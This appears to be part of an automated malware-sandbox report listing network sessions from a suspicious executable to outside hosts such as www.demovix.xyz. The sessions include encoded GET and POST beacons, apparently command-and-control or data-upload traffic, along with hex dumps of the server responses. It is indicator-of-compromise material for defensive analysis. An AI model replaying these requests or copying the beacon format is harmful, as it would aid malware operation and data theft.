                                                                                                                                                                                                              Data Ascii: tpTd=H+5bRSq0NrhhoTeyXQ/oUwusr0uA2lBQo+8mJT09Owpqnu1ygDgAAbjn49LZIrueG8XNpz5hZl6Y7MzDPjYrzBLskebF2ZtWouvaUsm3IlItm8fIZMhlj/jU34JhLewLD4bD8iisv43Zso3Jlhzun01spSX9Y/j+vR6kSekKYEDG/BTsIVqo7eH/75/NcGuhyeWqpu5lCC46Hi+fbCbBhswQx25NXtrlxqyOQ/bFVkw8omaRbyqGazxIbIQjTh1O9i295YMMjVaQ24nTT1gw2cY48vZh1IYdQctMzQHB6BsKozM8uAzg+zpBDSCyrNw+pQiPpPxhf62DdTAsHqY6kdxYHnj88j3Lfpa1qb6rGXC+ehwxDY1WMB8gisqO9pldoBrhxK3wL2S/M5KwnvgRgYGj4wuUZzeyErOYXbrbhriw8BdYFBZTBimOXo8a5Ub6+bjcriiA3N4PRpiYBx+d5SjWmZXg9MviNw3WmS7G2Ah8ZjSI938vPzOC2xVye1JTgtvnyaooXYjM5c+3+9wkgwEoCwdy8nirE0tm9jijJ1KUrbryreQToGyGPkHaEKB6eW608X0JNRh2MO4QSFu4QVpiYRoPzFIgymwT4pvAKUAXmTBVCbUy9Sl5JnLxW29yNlrEa4fFUpKbj/hzyGSRa/h7/4USlg2Cv1FemGskK/VVkn3fOo0yzieMYp70YIPyZssVRpR3MzTOc3tBsJgk4IKPZW0ciWMnrDvlFLtr4xV0+WRJ5cwgB6dhvmDXFLR2xlNbp0t1dwwfcT63noDTaabeGxpmVyu7Tgk3SeFelmBnNlBzfG+xbRwLEVHbAr93uAHf+dY2uc/oVPQzo78Gebjjq/pn1S2kBrcF97pWe1h3HRQyVFt1bZTxhVR2sbs0kHEfyjzPAnlZYU8HV2uNzrh1vNob9XGwn3dV7KddHWFTX0jD8gdXjRR9r8meUrDtpEoq56Pm7cT93D/EYZVZdaYEuYBzhsb3A/NzOLwzH0CG1Pl [TRUNCATED]


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              20192.168.2.9608353.33.130.190801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:56.215729952 CEST476OUTGET /szy7/?tpTd=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2jiKrkd/jwL9iqNrnd9yIGgMT9MzICA==&WX=rnWllP5PLlhLLtj HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.doggieradio.net
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Oct 8, 2024 15:34:56.673837900 CEST395INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:34:56 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 255
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 74 70 54 64 3d 4b 38 52 37 53 6e 53 66 62 37 64 6c 69 33 65 58 52 41 44 33 53 6e 6e 74 73 56 53 53 6a 31 5a 43 6a 73 52 6c 43 7a 49 73 44 57 4a 55 78 63 6c 63 67 7a 56 59 54 71 37 66 36 4e 37 2f 55 4b 6a 54 42 70 50 58 33 57 56 6f 50 48 2f 76 30 74 6a 35 44 6d 6b 32 6a 69 4b 72 6b 64 2f 6a 77 4c 39 69 71 4e 72 6e 64 39 79 49 47 67 4d 54 39 4d 7a 49 43 41 3d 3d 26 57 58 3d 72 6e 57 6c 6c 50 35 50 4c 6c 68 4c 4c 74 6a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?tpTd=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2jiKrkd/jwL9iqNrnd9yIGgMT9MzICA==&WX=rnWllP5PLlhLLtj"}</script></head></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              21192.168.2.960836199.192.19.19801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:35:06.768614054 CEST728OUTPOST /azuc/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.demovix.xyz
                                                                                                                                                                                                              Origin: http://www.demovix.xyz
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.demovix.xyz/azuc/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 46 47 75 55 66 75 67 39 59 79 56 51 35 4c 73 56 64 5a 4b 78 45 4c 49 45 4e 4b 5a 51 64 50 52 6e 43 48 4c 49 66 53 53 46 78 56 58 4f 4d 30 2b 32 52 34 57 35 43 41 6e 4d 45 4d 56 63 47 65 4f 37 51 79 4b 57 31 61 70 71 63 6e 52 4b 31 67 47 49 65 34 4d 76 30 41 78 38 79 67 70 41 47 47 30 41 35 65 56 54 48 43 76 61 6d 34 45 36 77 79 4a 35 70 47 6b 72 45 37 7a 61 73 66 45 41 38 74 52 35 57 6b 78 72 4e 34 49 57 47 62 78 47 36 65 4c 74 4d 46 4e 69 36 70 31 52 4f 45 72 48 71 50 59 72 76 37 4a 50 49 75 65 6b 54 61 37 73 76 58 69 48 2b 46 2b 65 75 41 65 70 58 6e 4e 66
                                                                                                                                                                                                              Data Ascii: tpTd=FGuUfug9YyVQ5LsVdZKxELIENKZQdPRnCHLIfSSFxVXOM0+2R4W5CAnMEMVcGeO7QyKW1apqcnRK1gGIe4Mv0Ax8ygpAGG0A5eVTHCvam4E6wyJ5pGkrE7zasfEA8tR5WkxrN4IWGbxG6eLtMFNi6p1ROErHqPYrv7JPIuekTa7svXiH+F+euAepXnNf
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.426352024 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:35:07 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                              Content-Length: 16026
                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.426424026 CEST1236INData Raw: 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38
                                                                                                                                                                                                              Data Ascii: .196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.426476955 CEST1236INData Raw: 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68
                                                                                                                                                                                                              Data Ascii: 5-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.5
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.426517010 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22
                                                                                                                                                                                                              Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none"
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.426551104 CEST1236INData Raw: 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20
                                                                                                                                                                                                              Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="48
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.426584959 CEST1236INData Raw: 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 34 37 2e 39 35 22 20 79 31 3d 22 35 35 31 2e 37 31 39 22 20 78 32 3d 22 32 34 30 2e 31 31 33 22 20 79 32
                                                                                                                                                                                                              Data Ascii: troke-miterlimit="10" x1="247.95" y1="551.719" x2="240.113" y2="551.719" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miter
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.426621914 CEST1236INData Raw: 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                              Data Ascii: ="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit=
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.426654100 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 35 34 39 2e 38 37 39 22 20 63 79 3d 22 32 39 36 2e 34 30 32 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                              Data Ascii: <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <c
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.426687956 CEST1236INData Raw: 33 63 2d 31 31 2e 30 38 36 2d 32 2e 39 37 32 2d 31 37 2e 36 36 34 2d 31 34 2e 33 36 39 2d 31 34 2e 36 39 32 2d 32 35 2e 34 35 35 6c 31 35 2e 36 39 34 2d 35 38 2e 35 33 37 0a 09 09 09 63 33 2e 38 38 39 2d 31 34 2e 35 30 34 2c 31 38 2e 37 39 39 2d
                                                                                                                                                                                                              Data Ascii: 3c-11.086-2.972-17.664-14.369-14.692-25.455l15.694-58.537c3.889-14.504,18.799-23.11,33.303-19.221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.426726103 CEST1236INData Raw: 37 63 35 2e 32 33 34 2d 33 2e 30 33 39 2c 37 2e 37 33 31 2d 38 2e 39 36 36 2c 36 2e 36 37 38 2d 31 34 2e 35 39 34 63 32 2e 33 34 34 2c 31 2e 33 34 33 2c 34 2e 33 38 33 2c 33 2e 32 38 39 2c 35 2e 38 33 37 2c 35 2e 37 39 33 0a 09 09 09 09 63 34 2e
                                                                                                                                                                                                              Data Ascii: 7c5.234-3.039,7.731-8.966,6.678-14.594c2.344,1.343,4.383,3.289,5.837,5.793c4.411,7.596,1.829,17.33-5.767,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.67
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.432147026 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 64 3d 22 0a 09 09 09 09 4d 33 35 33 2e 33 35 31 2c 33 36 35 2e 33 38 37 63 2d 37 2e 39 34 38 2c 31 2e 32 36 33 2d 31 36 2e 32 34 39 2c 30 2e 39
                                                                                                                                                                                                              Data Ascii: stroke-miterlimit="10" d="M353.351,365.387c-7.948,1.263-16.249,0.929-24.48-1.278c-8.232-2.207-15.586-6.07-21.836-11.14c-17.004,4.207-31.269,17.289-36.128,35.411l-1.374,5.123c-7.112,26.525,8.617,53.791,35.13,60.899l0,0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              22192.168.2.960837199.192.19.19801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:35:09.594202995 CEST752OUTPOST /azuc/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.demovix.xyz
                                                                                                                                                                                                              Origin: http://www.demovix.xyz
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 217
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.demovix.xyz/azuc/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 46 47 75 55 66 75 67 39 59 79 56 51 36 72 38 56 52 61 69 78 47 72 49 62 43 71 5a 51 4c 2f 52 6a 43 48 48 49 66 54 48 4f 77 6a 48 4f 56 56 4f 32 53 35 57 35 44 41 6e 4d 44 38 55 59 4c 2b 4f 6b 51 79 32 65 31 59 74 71 63 6e 31 4b 31 6c 71 49 65 49 77 67 31 51 78 2b 30 67 70 43 49 6d 30 41 35 65 56 54 48 43 37 77 6d 38 6f 36 77 69 5a 35 70 69 51 6b 59 72 7a 5a 37 76 45 41 34 74 51 2b 57 6b 77 45 4e 34 34 73 47 64 74 47 36 61 48 74 4c 57 56 6c 77 70 30 55 44 6b 71 4d 69 39 6c 4a 6f 38 46 30 44 34 66 44 44 38 6a 4e 68 57 43 5a 76 33 33 46 37 58 65 4f 51 41 45 33 30 7a 62 77 39 2b 59 6d 4d 4a 4c 35 35 78 61 4a 34 63 30 38 39 51 3d 3d
                                                                                                                                                                                                              Data Ascii: tpTd=FGuUfug9YyVQ6r8VRaixGrIbCqZQL/RjCHHIfTHOwjHOVVO2S5W5DAnMD8UYL+OkQy2e1Ytqcn1K1lqIeIwg1Qx+0gpCIm0A5eVTHC7wm8o6wiZ5piQkYrzZ7vEA4tQ+WkwEN44sGdtG6aHtLWVlwp0UDkqMi9lJo8F0D4fDD8jNhWCZv33F7XeOQAE30zbw9+YmMJL55xaJ4c089Q==
                                                                                                                                                                                                              Oct 8, 2024 15:35:10.238828897 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:35:10 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                              Content-Length: 16026
                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:35:10.238892078 CEST1236INData Raw: 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38
                                                                                                                                                                                                              Data Ascii: .196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,
                                                                                                                                                                                                              Oct 8, 2024 15:35:10.238926888 CEST1236INData Raw: 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68
                                                                                                                                                                                                              Data Ascii: 5-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.5
                                                                                                                                                                                                              Oct 8, 2024 15:35:10.238961935 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22
                                                                                                                                                                                                              Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none"
                                                                                                                                                                                                              Oct 8, 2024 15:35:10.239012957 CEST1236INData Raw: 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20
                                                                                                                                                                                                              Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="48
                                                                                                                                                                                                              Oct 8, 2024 15:35:10.239044905 CEST1236INData Raw: 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 34 37 2e 39 35 22 20 79 31 3d 22 35 35 31 2e 37 31 39 22 20 78 32 3d 22 32 34 30 2e 31 31 33 22 20 79 32
                                                                                                                                                                                                              Data Ascii: troke-miterlimit="10" x1="247.95" y1="551.719" x2="240.113" y2="551.719" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miter
                                                                                                                                                                                                              Oct 8, 2024 15:35:10.239078999 CEST1236INData Raw: 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                              Data Ascii: ="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit=
                                                                                                                                                                                                              Oct 8, 2024 15:35:10.239109993 CEST108INData Raw: 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 35 34 39 2e 38 37 39 22 20 63 79 3d 22 32 39 36 2e 34 30 32 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                              Data Ascii: <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fill="#0E0620
                                                                                                                                                                                                              Oct 8, 2024 15:35:10.239140987 CEST1236INData Raw: 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22
                                                                                                                                                                                                              Data Ascii: " cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.5
                                                                                                                                                                                                              Oct 8, 2024 15:35:10.239176989 CEST1236INData Raw: 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c 32 33 2e 31 31 2c 31 38 2e 37 39 39 2c 31 39 2e 32 32 31 2c 33 33 2e 33 30 33 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33
